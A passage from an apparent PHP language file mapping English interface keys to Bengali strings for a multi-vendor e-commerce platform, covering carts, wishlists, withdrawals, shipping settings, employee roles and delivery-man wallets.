যুক্ত করতে চান', 'want_to_cancel_this_order ' => 'এই অর্ডার ক্যানসেল করতে চান', 'want_to_change_status' => 'স্ট্যাটাস পরিবর্তন করতে চান', 'want_to_change_the_shipping_responsibility_to_Inhouse' => 'শিপিংয়ের দায়িত্ব ইনহাউসে পরিবর্তন করতে চান', 'want_to_change_the_shipping_responsibility_to_Seller_Wise' => 'বিক্রেতার কাছে শিপিংয়ের দায়িত্ব পরিবর্তন করতে চান', 'want_to_clear_all_cart ' => 'সমস্ত কার্ট সাফ করতে চান', 'want_to_clear_all_compare_list ' => 'সমস্ত কম্পেয়ার তালিকা সাফ করতে চান', 'want_to_clear_all_wishlist ' => 'সমস্ত উইশ লিস্ট সাফ করতে চান', 'want_to_delete_this_account' => 'এই অ্যাকাউন্টটি মুছতে চান', 'want_to_delete_this_account ' => 'এই অ্যাকাউন্টটি মুছতে চান', 'want_to_delete_this_address ' => 'এই ঠিকানাটি মুছতে চান', 'want_to_delete_this_coupon ' => 'এই কুপনটি মুছতে চান', 'want_to_delete_this_customer' => 'এই গ্রাহক মুছতে চান', 'want_to_delete_this_item' => 'এই আইটেমটি মুছতে চান', 'want_to_delete_this_item ' => 'এই আইটেমটি মুছতে চান', 'want_to_delete_this_method' => 'এই পদ্ধতিটি মুছতে চান', 'want_to_make_default_method' => 'ডিফল্ট পদ্ধতি করতে চান', 'want_to_remove_compare_list_product ' => 'কম্পেয়ার তালিকা পণ্য অপসারণ করতে চান', 'want_to_remove_this_information ' => 'এই তথ্য মুছে ফেলতে চান ', 'want_to_turn_OFF_msg91_sms' => 'এমএসজি 91 এসএমএস বন্ধ করতে চান', 'want_to_turn_OFF_nexmo_sms' => 'নেক্সমো এসএমএস বন্ধ করতে চান', 'want_to_turn_OFF_releans' => 'রিলিয়ান বন্ধ করতে চান', 'want_to_turn_OFF_twilio_sms' => 'twilio এসএমএস বন্ধ করতে চান', 'want_to_turn_OFF_twofactor_sms' => 'দ্বিগুণ এসএমএস বন্ধ করতে চান', 'want_to_turn_ON_msg91_sms' => 'এমএসজি 91 এসএমএস চালু করতে চান', 'want_to_turn_ON_nexmo_sms' => 'নেক্সমো এসএমএস চালু করতে চান', 'want_to_turn_ON_releans' => 'রিলিনগুলি চালু করতে চান', 'want_to_turn_ON_twilio_sms' => 'twilio এসএমএস চালু করতে চান', 'want_to_turn_ON_twofactor_sms' => 'দ্বিগুণ এসএমএস চালু করতে চান', 'want_to_unfollow_this_shop' => 'এই দোকানটি আনফলো করতে চান', 'want_to_update_status' => 'স্ট্যাটাস আপডেট করতে চান', 'want_tocancel_this_order ' => 'এই অর্ডারটি টোকেনসেল করতে চান', 'warely' => 'যুদ্ধে', 'warning' => 'সতর্কতা', 'wc-327477' => 'WC-327477', 'wc-327478' => 'WC-327478', 'wc-327479' => 'WC-327479', 'we_are_sorry' => 'আমরা দুঃখিত', 'we_are_using_the_most_advanced_security_to_provide_you_the_best_experience_ever.' => 'আপনাকে এখন পর্যন্ত সেরা অভিজ্ঞতা সরবরাহ করতে আমরা সর্বাধিক উন্নত সুরক্ষা ব্যবহার করছি।', 'we_will_email_you_a_temporary_code.' => 'আমরা আপনাকে একটি অস্থায়ী কোড ইমেল করব।', 'wearable' => 'পরিধানযোগ্য', 'web' => 'ওয়েব', 'web_&_app_settings' => 'ওয়েব এন্ড অ্যাপ্লিকেশন সেটিংস', 'web_admin' => 'ওয়েব অ্যাডমিন', 'web_application' => 'ওয়েব অ্যাপ্লিকেশন', 'web_color_setup' => 'ওয়েব রঙ সেটআপ', 'web_config' => 'ওয়েব কনফিগার', 'web_fav_icon' => 'ওয়েব ফেভ আইকন', 'web_footer' => 'ওয়েব ফুটার', 'website' => 'ওয়েবসাইট', 'website_Color' => 'ওয়েবসাইটের রঙ', 'website_Favicon' => 'ওয়েবসাইট ফ্যাভ আইকন', 'website_Footer_Logo' => 'ওয়েবসাইট ফুটার লোগো', 'website_Header_Logo' => 'ওয়েবসাইট শিরোনাম লোগো', 'website_problem' => 'ওয়েবসাইট সমস্যা', 'week' => 'সপ্তাহ', 'welcome' => 'স্বাগত', 'welcome_back_to_seller_login' => 'বিক্রেতা লগইনে স্বাগতম', 'welcome_message' => 'স্বাগত মেসেজ', 'welcome_to' => 'স্বাগতম', 'welcome_to_dashboard' => 'ড্যাশবোর্ডে স্বাগতম', 'welcome_to_your_dashboard' => 'আপনার ড্যাশবোর্ডে আপনাকে স্বাগতম', 'what_is_App_Version' => 'অ্যাপ সংস্করণ কি', 'what_you_need' => 'আপনি কি চান', 'whatsApp' => 'হোয়াটসঅ্যাপ', 'whatsapp_information_update_successfully' => 'হোয়াটসঅ্যাপের তথ্য সফলভাবে আপডেট', 'whatsapp_number' => 'হোয়াটসঅ্যাপ নম্বর', 'whatsapp_phone_number' => 'হোয়াটসঅ্যাপ ফোন নম্বর', 'when_a_deliveryman_arrives_for_delivery_they_must_provide_the_code_to_the_deliveryman_to_verify_the_order_delivery' => 'যখন একজন ডেলিভারিম্যান ডেলিভারির জন্য আসে তখন তাদের অর্ডার ডেলিভারি যাচাই করার জন্য ডেলিভারিম্যানকে কোড পেমেন্ট করতে হবে', 'when_converting_loyalty_points_to_currency_customers_will_require_the_minimum_loyalty_point_set_by_the_admin' => 'মুদ্রা গ্রাহকদের লয়াল্টি পয়েন্ট রূপান্তর করার সময় অ্যাডমিন দ্বারা নির্ধারিত ন্যূনতম লয়াল্টি পয়েন্টের প্রয়োজন হবে', 'where_to_get_this_information ' => 'এই তথ্য কোথায় পাবেন', 'which_will_be_shown_in_search_engine_results' => 'যা সার্চ ইঞ্জিনের ফলাফলগুলিতে প্রদর্শিত হবে', 'will be sent to your number provide that' => 'আপনার নম্বরটি সরবরাহ করা হবে এটি সরবরাহ করুন', 'wish' => 'উইশ', 'wish_Listed_Products' => 'তালিকাভুক্ত পণ্য উইশ', 'wish_list' => 'উইশ লিস্ট', 'wish_listed' => 'উইশ লিস্টেড', 'wishes' => 'উইশ', 'wishlist' => 'উইশ লিস্ট', 'wishlist_Removed' => 'উইশ লিস্ট সরানো হয়েছে', 'wishlist_sort_by_(high_to_low)' => 'উইশ লিস্ট বাছাই (উচ্চ থেকে নিম্ন)', 'wishlist_sort_by_(low_to_high)' => 'উইশ লিস্ট বাছাই (নিম্ন থেকে উচ্চ)', 'wishlists' => 'উইশ লিস্ট', 'withdraw' => 'উইথড্র', 'withdraw requests' => 'উইথড্র রিকোয়েস্ট', 'withdraw_Request' => 'অনুরোধ উইথড্র', 'withdraw_Request_Table' => 'অনুরোধ টেবিল উইথড্র করুন', 'withdraw_able_balance' => 'এনাবল ব্যালেন্স উইথড্র', 'withdraw_method_list' => 'উইথড্র পদ্ধতি তালিকা করুন', 'withdrawable_balance' => 'উইথড্রযোগ্য ব্যালেন্স', 'withdrawal methods' => 'উইথড্র পদ্ধতি', 'withdrawal_Methods' => 'উইথড্র পদ্ধতি', 'withdrawble_Balance' => 'উইথড্র ব্যালেন্স', 'withdrawn' => 'উইথড্র', 'withdraws' => 'উইথড্র', 'women s shoes' => 'মহিলাদের জুতা', 'write_coupon_code_here' => 'এখানে কুপন কোড লিখুন', 'write_something' => 'কিছু লিখুন', 'write_your_message_here' => 'আপনার মেসেজ এখানে লিখুন', 'yes' => 'হ্যাঁ', 'yes_change_it' => 'হ্যাঁ এটি পরিবর্তন করুন', 'yes_delete_it' => 'হ্যাঁ এটি মুছবেন', 'yes_i_Accept' => 'হ্যাঁ আমি গ্রহণ করলাম', 'you do not have sufficient balance for pay this order!!' => 'এই অর্ডারটি পেমেন্ট জন্য আপনার পর্যাপ্ত ব্যালেন্স নেই !!', 'you_Get_Free_Delivery_Bonus' => 'আপনি বিনামূল্যে ডেলিভারি বোনাস পাবেন', 'you_are_already_login_proceed' => 'আপনি ইতিমধ্যে লগইন অগ্রগতি হয়', 'you_can_check_our' => 'আপনি আমাদের চেক করতে পারেন', 'you_can_download_the_example_file_to_understand_how_the_data_must_be_filled.' => 'ডেটা কীভাবে পূরণ করতে হবে তা বুজতে আপনি উদাহরণ ফাইলটি ডাউনলোড করতে পারেন।', 'you_can_get_brand_and_category_id_from_their_list_please_input_the_right_ids.' => 'আপনি তাদের তালিকা থেকে ব্র্যান্ড এন্ড ক্যাটাগরি আইডি পেতে পারেন দয়া করে ডান আইডিগুলি ইনপুট করুন।', 'you_can_not_change_it' => 'আপনি এটি পরিবর্তন করতে পারবেন না', 'you_can_refund_request_after_the_product_is_delivered!' => 'পণ্য সরবরাহ করার পরে আপনি অনুরোধ রিফান্ড দিতে পারেন!', 'you_can_review_after_product_is_delivered!' => 'পণ্য সরবরাহ করার পরে আপনি রিভিউ করতে পারেন!', 'you_can_review_after_the_product_is_delivered!' => 'পণ্য সরবরাহ করার পরে আপনি রিভিউ করতে পারেন!', 'you_can_setup_theme_wise_required_data_from_there.' => 'আপনি সেখান থেকে থিম অনুসারে প্রয়োজনীয় ডেটা সেটআপ করতে পারেন।', 'you_can_upload_your_product_images_in_product_folder_from_gallery_and_copy_image_path.' => 'আপনি গ্যালারী থেকে পণ্য ফোল্ডারে আপনার পণ্য চিত্রগুলি আপলোড করতে পারেন এন্ড চিত্রের পথটি অনুলিপি করতে পারেন।', 'you_can_use_this_ID_to_track_your_order_later' => 'আপনি পরে আপনার অর্ডার ট্র্যাক করতে এই আইডিটি ব্যবহার করতে পারেন', 'you_cannot_add_product_to_cart_from_this_shop_for_now' => 'আপনি আপাতত এই দোকান থেকে কার্টে পণ্য যুক্ত করতে পারবেন না', 'you_do_not_have_sufficient_balance_for_pay_this_order' => 'এই অর্ডারের পে করার জন্য আপনার পর্যাপ্ত ব্যালেন্স হবে নেই', 'you_do_not_have_sufficient_balance_for_pay_this_order!!' => 'এই অর্ডারটি পেমেন্ট জন্য আপনার পর্যাপ্ত ব্যালেন্স নেই !!', 'you_have_new order' => 'আপনার নতুন অর্ডার আছে', 'you_have_new_order' => 'আপনার নতুন অর্ডার আছে', 'you_have_switched_theme_successfully' => 'আপনি সফলভাবে থিম স্যুইচ করেছেন', 'you_have_to_input_all_the_banners_again_for_each_section' => 'প্রতিটি ক্যাটাগরি জন্য আপনাকে আবার সমস্ত ব্যানার ইনপুট করতে হবে', 'you_made_your_earning' => 'আপনি আপনার উপার্জন করেছেন', 'you_may_also_like' => 'আপনিও পছন্দ করতে পার', 'you_order_has_been_confirmed_and_will_be_shipped_according_to_the_method_you_selected' => 'আপনার অর্ডার নিশ্চিত হয়ে গেছে এন্ড আপনি নির্বাচিত পদ্ধতি অনুসারে প্রেরণ করা হবে', 'you_setup_those_data_from_there.' => 'আপনি সেখান থেকে সেই ডেটা সেটআপ করুন।', 'you_want_to_add_fund' => 'আপনি ফান্ড যোগ করতে চান', 'you_want_to_remove_all_items_from_cart' => 'আপনি কার্ট থেকে সমস্ত আইটেম অপসারণ করতে চান', 'you_will not_be_able_to_revert_this' => 'আপনি এটি ফিরিয়ে দিতে এনাবল হবেন না', 'you_will_get_response' => 'আপনি রেসপন্স পাবেন', 'you_will_get_response_soon' => 'আপনি শীঘ্রই রেসপন্স পাবেন', 'you_will_lost_the_this_addon' => 'আপনি এই অ্যাডনটি হারাবেন', 'you_will_lost_the_this_theme' => 'আপনি এই থিমটি হারাবেন', 'you_will_not_be able_to_revert_this' => 'আপনি এটি ফিরিয়ে দিতে এনাবল হবেন না', 'you_will_not_be_able_to_revert_this' => 'আপনি এটি ফিরিয়ে দিতে এনাবল হবেন না', 'you_will_receive_an_email_confirmation_when_your_order_is_completed' => 'আপনার অর্ডার শেষ হয়ে গেলে আপনি একটি নিশ্চিতকরণ ইমেল পাবেন', 'you_will_receive_an_email_confirmation_when_your_order_is_completed.' => 'আপনার অর্ডার শেষ হয়ে গেলে আপনি একটি নিশ্চিতকরণ ইমেল পাবেন।', 'you_wont_be_able_to_revert_this' => 'আপনি এটি ফিরিয়ে দিতে এনাবল হবেন না', 'your' => 'আপনার', 'your loyalty point will convert to currency and transfer to your wallet' => 'আপনার লয়াল্টি পয়েন্ট মুদ্রায় রূপান্তরিত হবে এন্ড আপনার ওয়ালেট স্থানান্তর করবে', 'your_Email_Address' => 'আপনার ইমেইল ঠিকানা', 'your_Order_ID' => 'আপনার অর্ডার আইডি', 'your_account_is_ready_to_use' => 'আপনার অ্যাকাউন্ট ব্যবহার করতে প্রস্তুত', 'your_address' => 'আপনার ঠিকানা', 'your_cart_is_empty' => 'আপনার কার্ট খালি', 'your_current_balance' => 'আপনার বর্তমান ব্যালেন্স', 'your_email' => 'আপনার ইমেইল', 'your_first_name' => 'আপনার নামের প্রথম অংশ', 'your_loyalty_point_will_convert_to_currency_and_transfer_to_your_wallet' => 'আপনার লয়াল্টি পয়েন্ট মুদ্রায় রূপান্তরিত হবে এন্ড আপনার ওয়ালেট স্থানান্তর করবে', 'your_name' => 'আপনার নাম', 'your_order_confirm' => 'আপনার অর্ডার নিশ্চিত', 'your_order_has_been_placed_successfully' => 'আপনার অর্ডার সফলভাবে স্থাপন করা হয়েছে', 'your_order_has_been_placed_successfully!' => 'আপনার অর্ডার সফলভাবে স্থাপন করা হয়েছে!', 'your_order_is_completed' => 'আপনার অর্ডার শেষ হয়েছে', 'your_order_placed_successfully' => 'আপনার অর্ডার সফলভাবে প্লেস হয়েছে', 'your_password_must_be_at_least_8_characters' => 'আপনার পাসওয়ার্ড অবশ্যই কমপক্ষে 8 টি অক্ষর হতে হবে', 'your_personal_code' => 'আপনার ব্যক্তিগত কোড', 'your_phone' => 'আপনার ফোন', 'your_phone_number' => 'আপনার ফোন নম্বর', 'your_server_php' => 'আপনার সার্ভার পিএইচপি', 'your_shop_address' => 'আপনার দোকানের ঠিকানা', 'youtube_video_link' => 'ইউটিউব ভিডিও লিঙ্ক', 'z_a' => 'জেড এ', 'z_to_a_Order' => 'জেড টু এ অর্ডার', 'z_to_a_order' => 'জেড টু এ অর্ডার', 'zip' => 'জিপ', 'zip_Code' => 'জিপ কোড', 'zip_code' => 'জিপ কোড', 'zone' => 'জোন', 'Theme Changed to Default' => 'থিম ডিফল্টে পরিবর্তিত হয়েছে', 'Secure_Payment' => 'সিকিউর পেমেন্ট', '24/7_Support_Center' => '24/7 সাপোর্ট সেন্টার', 'Customers_will_not_be_able_to_select_COD_as_a_payment_method_during_checkout' => 'গ্রাহকরা চেকআউটের সময় পেমেন্ট পদ্ধতি হিসাবে COD নির্বাচন করতে পারবেন না', 'please_review_your_settings_and_enable_COD_if_you_wish_to_offer_this_payment_option_to_customers' => 'অনুগ্রহ করে আপনার সেটিংস রিভিউ করুন এবং আপনি যদি গ্রাহকদের এই অর্থপ্রদানের অপসনটি অফার করতে চান তাহলে COD এনাবল করুন৷', 'dont_miss_todays_deal' => 'আজকের ডিল মিস করবেন না', 'no_size' => 'সাইজ নেই', 'M51' => 'M51', 'M31' => 'M31', 'no_type' => 'টাইপ নাই', 'Features_Section' => 'ফীচার বিভাগ', 'order_Place' => 'অর্ডার প্লেস', 'point_To_Wallet' => 'পয়েন্ট টু ওয়ালেট', 'forget_password' => 'পাসওয়ার্ড ভুলে গেছেন', 'please_enter_your_phone_number_to send_a_verification_code_for_forget_password' => 'পাসওয়ার্ড ভুলে যাওয়ার জন্য একটি যাচাইকরণ কোড পাঠাতে অনুগ্রহ করে আপনার ফোন নম্বর লিখুন', 'back_again' => 'ব্যাক এগেইন', 'No_such_user_found' => 'কোন ব্যবহারকারী পাওয়া যায় নি', 'Language_Added' => 'ভাষা যোগ করা হয়েছে', 'want_to_Turn_ON_This_Shipping_Method' => 'এই শিপিং পদ্ধতি চালু করতে চান', 'want_to_Turn_OFF_This_Shipping_Method' => 'এই শিপিং পদ্ধতি বন্ধ করতে চান', 'if_you_enable_this_shipping_method_will_be_shown_in_the_user_app_and_website_for_customer_checkout' => 'আপনি যদি এই শিপিং পদ্ধতিটি এনাবল করেন তবে গ্রাহক চেকআউটের জন্য ব্যবহারকারী অ্যাপ এবং ওয়েবসাইটে দেখানো হবে', 'if_you_disable_this_shipping_method_will_not_be_shown_in_the_user_app_and_website_for_customer_checkout' => 'আপনি যদি এই শিপিং পদ্ধতিটি ডিসেবল করেন তবে গ্রাহক চেকআউটের জন্য ব্যবহারকারী অ্যাপ এবং ওয়েবসাইটে দেখানো হবে না', 'category_cost_successfully_updated' => 'ক্যাটাগরি খরচ সফলভাবে আপডেট করা হয়েছে', 'Want_to_enable_the_Temporary_Close' => 'সাময়িক বন্ধ সক্রিয় করতে চান', 'Want_to_disable_the_Temporary_Close' => 'সাময়িক বন্ধ নিষ্ক্রিয় করতে চান', 'if_you_enable_this_option_your_shop_will_be_shown_as_temporarily_closed_in_the_user_app_and_website_and_customers_cannot_add_products_from_your_shop' => 'আপনি যদি এই অপসনটি এনাবল করেন তবে ব্যবহারকারী অ্যাপ এবং ওয়েবসাইটে আপনার দোকানটি সাময়িকভাবে বন্ধ হিসাবে দেখানো হবে এবং গ্রাহকরা আপনার দোকান থেকে পণ্য যোগ করতে পারবেন না', 'if_you_disable_this_option_your_shop_will_be_open_in_the_user_app_and_website_and_customers_can_add_products_from_your_shop' => 'আপনি এই অপসনটি নিষ্ক্রিয় করলে আপনার দোকান ব্যবহারকারী অ্যাপ এবং ওয়েবসাইটে খোলা থাকবে এবং গ্রাহকরা আপনার দোকান থেকে পণ্য যোগ করতে পারবেন', 'by_turning_on_temporary_close_mode_your_shop_will_be_shown_as_temporary_off_in_the_website_and_app_for_the_customers._they_cannot_purchase_or_place_order_from_your_shop' => 'অস্থায়ী বন্ধ মোড চালু করার মাধ্যমে গ্রাহকদের জন্য ওয়েবসাইট এবং অ্যাপে আপনার দোকান সাময়িক বন্ধ হিসাবে দেখানো হবে। তারা আপনার দোকান থেকে ক্রয় বা অর্ডার দিতে পারে না', 'Vacation_mode_updated_successfully' => 'ভ্যাকেশন মোড সফলভাবে আপডেট করা হয়েছে', 'temporary_close_active_successfully' => 'সাময়িক বন্ধ সফলভাবে সক্রিয়', 'for_“Ready_Product”_deliveries _customers_can_pay_&_instantly_download_pre-uploaded_digital_products._For_“Ready_After_Sale”_deliveries _customers_pay_first _then_seller_uploads_the_digital_products_that_become_available_to_customers_for_download' => '"রেডি প্রোডাক্ট" ডেলিভারির জন্য গ্রাহকরা পেমেন্ট করতে পারবেন এবং তাৎক্ষণিকভাবে প্রি-আপলোড করা ডিজিটাল পণ্য ডাউনলোড করতে পারবেন। "রেডি আফটার সেল" ডেলিভারির জন্য গ্রাহকরা প্রথমে অর্থ প্রদান করে তারপর বিক্রেতা ডিজিটাল পণ্যগুলি আপলোড করে যা গ্রাহকদের ডাউনলোডের জন্য উপলব্ধ হয়', 'product_SKU' => 'পণ্য SKU', 'create_a_unique_product_code_by_clicking_on_the_“Generate_Code”_button' => '"কোড তৈরি করুন" বাটন ক্লিক করে একটি অনন্য পণ্য কোড তৈরি করুন', 'set_the_selling_price_for_each_unit_of_this_product._This_Unit_Price_section_won’t_be_applied_if_you_set_a_variation_wise_price' => 'এই পণ্যের প্রতিটি ইউনিটের জন্য বিক্রয় মূল্য সেট করুন। আপনি যদি ভিন্নতা অনুসারে মূল্য সেট করেন তবে এই ইউনিট মূল্য বিভাগটি প্রয়োগ করা হবে না', 'set_the_minimum_order_quantity_that_customers_must_choose._Otherwise _the_checkout_process_won’t_start' => 'ন্যূনতম অর্ডারের পরিমাণ সেট করুন যা গ্রাহকদের বেছে নিতে হবে। অন্যথায় চেকআউট প্রক্রিয়া শুরু হবে না', 'if_“Flat” _discount_amount_will_be_set_as_fixed_amount._If_“Percentage” _discount_amount_will_be_set_as_percentage.' => 'যদি "ফ্ল্যাট" ছাড়ের পরিমাণ নির্দিষ্ট পরিমাণ হিসাবে সেট করা হবে। যদি "শতাংশ" ছাড়ের পরিমাণ শতাংশ হিসাবে সেট করা হবে।', 'ex: 5' => 'এক্সাম্পল: 5', 'set_the_tax_calculation_method_from_here._Select_“Include_with_product”_to_combine_product_price_and_tax_on_the_checkout._Pick_“Exclude_from_product”_to_display_product_price_and_tax_amount_separately.' => 'এখান থেকে ট্যাক্স গণনা পদ্ধতি সেট করুন। চেকআউটে পণ্যের মূল্য এবং ট্যাক্স একত্রিত করতে "পণ্যের সাথে অন্তর্ভুক্ত করুন" নির্বাচন করুন। পণ্যের মূল্য এবং করের পরিমাণ আলাদাভাবে প্রদর্শন করতে "পণ্য থেকে বাদ দিন" বেছে নিন।', 'add_your_products_thumbnail_in' => 'আপনার পণ্য থাম্বনেল যোগ করুন', 'Upload_Image' => 'ইমেজ আপলোড করুন', 'add_meta_titles_descriptions_and_images_for_products' => 'পণ্যের জন্য মেটা শিরোনাম বিবরণ এবং ছবি যোগ করুন', 'this_will_help_more_people_to_find_them_on_search_engines_and_see_the_right_details_while_sharing_on_other_social_platforms' => 'এটি সার্চ ইঞ্জিনে তাদের খুঁজে পেতে এবং অন্যান্য সামাজিক প্ল্যাটফর্মে শেয়ার করার সময় সঠিক বিবরণ দেখতে আরও বেশি লোককে সাহায্য করবে৷', 'add_the_products_title_name_taglines_etc_here' => 'এখানে পণ্যের শিরোনামের নাম ট্যাগলাইন ইত্যাদি যোগ করুন', 'this_title_will_be_seen_on_Search_Engine_Results_Pages_and_while_sharing_the_products_link_on_social_platforms' => 'এই শিরোনামটি সার্চ ইঞ্জিন ফলাফল পৃষ্ঠাগুলিতে এবং সোশ্যাল প্ল্যাটফর্মে পণ্যের লিঙ্ক শেয়ার করার সময় দেখা যাবে', 'character_Limit' => 'অক্ষর সীমা', 'write_a_short_description_of_the_InHouse_shops_product' => 'ইনহাউস শপ পণ্যের একটি সংক্ষিপ্ত বিবরণ লিখুন', 'this_description_will_be_seen_on_Search_Engine_Results_Pages_and_while_sharing_the_products_link_on_social_platforms' => 'এই বিবরণটি সার্চ ইঞ্জিন ফলাফল পৃষ্ঠাগুলিতে এবং সোশ্যাল প্ল্যাটফর্মে পণ্যের লিঙ্ক শেয়ার করার সময় দেখা যাবে', 'search_delivery_men' => 'ডেলিভারি ম্যান অনুসন্ধান করুন', 'type_something!' => 'কিছু টাইপ করুন!', 'products_Stock' => 'পণ্য স্টক', 'bank_Info' => 'ব্যাংক তথ্য', 'edit_Bank_info' => 'এডিট ব্যাংক তথ্য', 'edit_Bank_Info' => 'এডিট ব্যাংক তথ্য', 'account_No' => 'একাউন্ট ', 'country_code_is_must_like_for_BD_880' => 'কান্ট্রি কোড BD +880 এর মত হতে হবে', 'new_Password' => 'নতুন পাসওয়ার্ড', 'confirm_Password' => 'পাসওয়ার্ড নিশ্চিত করুন', 'Privacy_policy_Updated_successfully' => 'প্রাইভেসী পলিসি সফলভাবে আপডেট করা হয়েছে৷', 'upload_File' => 'ফাইল আপলোড করুন', 'choose_Images' => 'ছবি নির্বাচন করুন', 'file_path_copied_successfully' => 'ফাইল পাথ সফলভাবে কপি করা হয়েছে৷', 'image_uploaded_successfully' => 'ছবি সফলভাবে আপলোড করা হয়েছে৷', 'if_enabled_this_icon_will_be_available_on_the_website_and_customer_app' => 'এনাবল করা হলে এই আইকনটি ওয়েবসাইট এবং গ্রাহক অ্যাপে পাওয়া যাবে', 'if_disabled_this_icon_will_be_hidden_from_the_website_and_customer_app' => 'ডিসাবল করা হলে এই আইকনটি ওয়েবসাইট এবং গ্রাহক অ্যাপ থেকে লুকানো হবে', 'Terms_and_Condition_Updated_successfully' => 'টার্মস এন্ড কন্ডিশন সফলভাবে আপডেট করা হয়েছে৷', 'want_to_Turn_ON' => 'চালু করতে চান', 'want_to_Turn_OFF' => 'বন্ধ করতে চান', 'if_you_enable_this_option_refund_policy_page_will_be_shown_in_the_user_app_and_website' => 'আপনি যদি এই অপসনটি এনাবল করেন তবে রিফান্ড পলিসি পৃষ্ঠাটি ব্যবহারকারীর অ্যাপ এবং ওয়েবসাইটে প্রদর্শিত হবে', 'if_you_disable_this_option_refund_policy_page_will_not_be_shown_in_the_user_app_and_website' => 'আপনি যদি এই অপসনটি ডিসাবল করেন তবে রিফান্ড পলিসি পৃষ্ঠা ব্যবহারকারী অ্যাপ এবং ওয়েবসাইটে দেখানো হবে না', 'if_you_enable_this_option_return_policy_page_will_be_shown_in_the_user_app_and_website' => 'আপনি যদি এই অপসনটি এনাবল করেন তবে ব্যবহারকারীর অ্যাপ এবং ওয়েবসাইটে রিটার্ন পলিসি পৃষ্ঠাটি দেখানো হবে', 'if_you_disable_this_option_return_policy_page_will_not_be_shown_in_the_user_app_and_website' => 'আপনি এই অপসনটি ডিসাবল করলে রিটার্ন পলিসি পৃষ্ঠাটি ব্যবহারকারীর অ্যাপ এবং ওয়েবসাইটে দেখানো হবে না', 'if_you_enable_this_option_cancellation_policy_page_will_be_shown_in_the_user_app_and_website' => 'আপনি যদি এই অপসনটি এনাবল করেন তবে ক্যান্সল্যাশন পলিসি পৃষ্ঠা ব্যবহারকারী অ্যাপ এবং ওয়েবসাইটে প্রদর্শিত হবে', 'if_you_disable_this_option_cancellation_policy_page_will_not_be_shown_in_the_user_app_and_website' => 'আপনি এই অপসনটি ডিসাবল করলে ক্যান্সল্যাশন পলিসি পৃষ্ঠা ব্যবহারকারী অ্যাপ এবং ওয়েবসাইটে দেখানো হবে না', 'FAQ_Update_successfully' => 'FAQ সফলভাবে আপডেট হয়েছে৷', 'FAQ_added_successfully' => 'FAQ সফলভাবে যোগ করা হয়েছে৷', 'about_us_updated_successfully' => 'এবাউট আস সফলভাবে আপডেট করা হয়েছে৷', 'add_new_field' => 'নতুন ফিল্ড যোগ করুন', 'vacation_mode_updated_successfully' => 'ভ্যাকেশন মোড সফলভাবে আপডেট করা হয়েছে৷', 'shop_cover_image' => 'শপ কভার ছবি', 'offer_banner' => 'অফার ব্যানার', 'Offer' => 'অফার', 'ex: 70' => 'এক্সাম্পল: 70', 'create_Role' => 'ভূমিকা তৈরি করুন', 'select_All' => 'সব সিলেক্ট করুন', 'employee_Roles' => 'কর্মচারীর ভূমিকা', 'order management' => 'অর্ডার ম্যানেজমেন্ট', 'system settings' => 'সিস্টেম সেটিংস', 'when_the_status_is_enabled_employees_can_access_the_system_to_perform_their_responsibilities.' => 'স্ট্যাটাস এনাবল হলে কর্মচারীরা তাদের দায়িত্ব পালন করতে সিস্টেম অ্যাক্সেস করতে পারে।', 'when_the_status_is_disabled_employees_cannot_access_the_system_to_perform_their_responsibilities' => 'যখন স্ট্যাটাস নিষ্ক্রিয় হয় তখন কর্মচারীরা তাদের দায়িত্ব পালনের জন্য সিস্টেমে অ্যাক্সেস করতে পারে না', 'are_you_sure_delete_this_role' => 'আপনি কি নিশ্চিত এই ভূমিকা মুছে ফেলুন', 'role_deleted_successfully' => 'ভূমিকা সফলভাবে মুছে ফেলা হয়েছে৷', 'edit_Role' => 'ভূমিকা এডিট করুন', 'role_Update' => 'ভূমিকা আপডেট', 'role_updated_successfully' => 'ভূমিকা সফলভাবে আপডেট করা হয়েছে৷', 'employee Add' => 'কর্মচারী যোগ করুন', 'add_New_Employee' => 'নতুন কর্মচারী যোগ করুন', 'earning_Statement' => 'উপার্জন স্টেটমেন্ট', 'earning_statement' => 'উপার্জন স্টেটমেন্ট', 'order_History_Log' => 'অর্ডার হিস্ট্রি লগ', 'deliveryman_Wallet' => 'ডেলিভারিম্যান ওয়ালেট', 'cash_in_hand' => 'ক্যাশ ইন হ্যান্ড', 'collect_Cash' => 'কালেক্ট ক্যাশ', 'current_balance' => 'কারেন্ট ব্যালেন্স', 'total_withdrawn' => 'মোট উইথড্রন', 'delivery_Man_Account' => 'ডেলিভারি ম্যান অ্যাকাউন্ট', 'no_Data_found' => 'কোনো ডেটা পাওয়া যায়নি', 'cash_Withdraw' => 'ক্যাশ উইথড্র', 'total_Cash_In_Hand' => 'মোট ক্যাশ ইন হ্যান্ড', 'search_by_order_no' => 'অর্ডার নং দ্বারা অনুসন্ধান করুন', 'current_status' => 'বর্তমান অবস্থা', 'history' => 'হিস্টোরি', 'history_of_Order_No:' => 'হিস্টোরি অফ অর্ডার:', 'service_Time' => 'সার্ভিস টাইম', 'enter_withdraw_amount' => 'উইথড্রর পরিমাণ লিখুন', 'receive' => 'রিসিভ', 'no_Country_Found' => 'কোন দেশ পাওয়া যায়নি', 'amount_receive_successfully' => 'পরিমাণ সফলভাবে প্রাপ্ত', 'super_admin' => 'সুপার অ্যাডমিন', 'search_delivery_man' => 'সার্চ ডেলিভারি ম্যান', 'no_Message_available' => 'নো মেসেজ এভেইল্যাবল', 'Type_Something' => 'কিছু টাইপ করুন', 'withdraw_information_view' => 'উইথড্রর তথ্য ভিউ ', 'delivery_Man_Withdraw_Information' => 'ডেলিভারি ম্যান উইথড্রর তথ্য', 'withdraw_request_process' => 'উইথড্রর অনুরোধ প্রক্রিয়া', 'approve' => 'অপ্প্রভ', 'note_about_transaction_or_request' => 'লেনদেন বা অনুরোধ সম্পর্কে নোট', 'Delivery_man_payment_has_been_approved_successfully' => 'ডেলিভারি ম্যান পেমেন্ট সফলভাবে অনুমোদিত হয়েছে', 'add_New_Contact_Information' => 'নতুন যোগাযোগ তথ্য যোগ করুন', 'contact_name' => 'যোগাযোগের নাম', 'contact_information_Table' => 'যোগাযোগ তথ্য টেবিল', 'want_to_remove_this_information' => 'এই তথ্য মুছে ফেলতে চান', 'emergency_contact_added_successfully' => 'জরুরী যোগাযোগ সফলভাবে যোগ করা হয়েছে', 'contact_status_changed_successfully' => 'যোগাযোগের স্ট্যাটাস সফলভাবে পরিবর্তিত হয়েছে', 'emergency_contact_deleted_successfully' => 'জরুরী যোগাযোগ সফলভাবে মুছে ফেলা হয়েছে', 'products_Not_Found' => 'পণ্য খুঁজে পাওয়া যায়নি', 'sorry_no_data_found_related_to_your_search' => 'দুঃখিত আপনার অনুসন্ধান সম্পর্কিত কোন তথ্য পাওয়া যায়নি', 